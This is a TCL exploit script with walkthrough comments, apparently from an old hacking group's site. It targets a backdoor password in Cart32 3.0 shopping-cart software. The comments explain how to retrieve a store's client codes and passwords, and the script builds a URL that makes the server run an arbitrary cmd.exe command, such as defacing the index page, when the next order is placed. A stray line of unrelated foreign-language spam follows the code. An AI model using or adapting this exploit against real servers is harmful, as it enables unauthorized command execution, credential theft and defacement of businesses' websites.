#!/usr/bin/tcl # [r00tabega.security.labs] # www.r00tabega.com # code by futant # backdoor found by cerberus information security team # http://www.cerberus-infosec.com {/advcart32.html} # NOTE: This is terribly easy to exploit but it takes a few minutes # # Ok, heres how you do this. # Go to www.myserver.com/scripts/cart32.exe # If it says Cart32.exe 3.0, you are probably in luck # # Now, go to www.myserver.com/scripts/cart32.exe/cart32clientlist # This is where the author put a backdoor in. # type "wemilo" in the text field and hit the "Go" button # # Find the Client Code (username) that is for the site you are going # to hack for example, www.myshophite.com's client code might be MSS # or MYSHOP copy and paste the client code and client password into # notepad/pico/whatever. # # Now run this script. It is a TCL script so therefore requires TCL. # If you have a UNIX system, skip this part. If you are using windows # get TCL from http://www.scriptics.com and run it like this: # Start -> Run -> tclsh83 wemilo.tcl # # # This script will ask your for the hostname you are hacking, # the client code, and client password. # # Then it will ask you for the command you want to run on the remote # server. # # (Hint: Sometimes IIS will give you the HTML root directory if you # go to http://server.com/whatever.ida .idc, .ida or # /cgi-bin/whatever.pl) # # Then this script will write data to an html file on your machine in # the current directory called wemilo.html. # Open this file in netscape or IE and click on the # link. This will hopefully bring you to a Cart32 WWW page # that will have tons of shit on it and a text box with your command # in it. Scroll down to the bottom of the page and click "Save Cart32+ tab" # # Now the next order that comes through will run the command you selected. # Go back to the main page of the site and add some shit to a shopping cart. # If they accept check/money order fill in bogus crap and then confirm the order. # your command will then be run. # # This DOES work unlike most supposed exploits. # # # (IDK 2k) package require http puts "Cart32 exploit helper by futant" puts "\nEnter the the hostname you wish to hack\nDo NOT include http://" puts -nonewline "Host: " flush stdout set hostname [gets stdin] puts "\nOk now, type in the Client code that you wish to use.\nYou can get a client code by going to:\nhttp://$hostname/scripts/cart32.exe/Cart32ClientList\nand typing wemilo for the password." puts -nonewline "Client Code: " flush stdout set clientcode [gets stdin] puts "\nEnter the clients password: (Also obtained from the URL above)" puts -nonewline "Client Password: " flush stdout set clientpassword [gets stdin] puts "\nNow type the command you want to run on the remote server: " puts "(example: echo h4x0r3d by futant! > c:\\InetPub\\wwwroot\\index.html )" puts -nonewline "cmd /c " flush stdout set command [gets stdin] if {[catch {open wemilo.html w} fid]} { puts "ERROR: Couldnt open file for writing, copy and paste this URL.\n" set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"] puts "\nYour custom exploit string is:" puts "http://$hostname/scripts/c32web.exe?$endstring" } set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"] puts "\nYour custom exploit string is:" puts "http://$hostname/scripts/c32web.exe?$endstring" puts $fid {} puts $fid "Click here to hack $hostname" puts $fid {} close $fid puts "\nWrote to wemilo.html :]\nExiting..." # k-rad.

亚洲欧美在线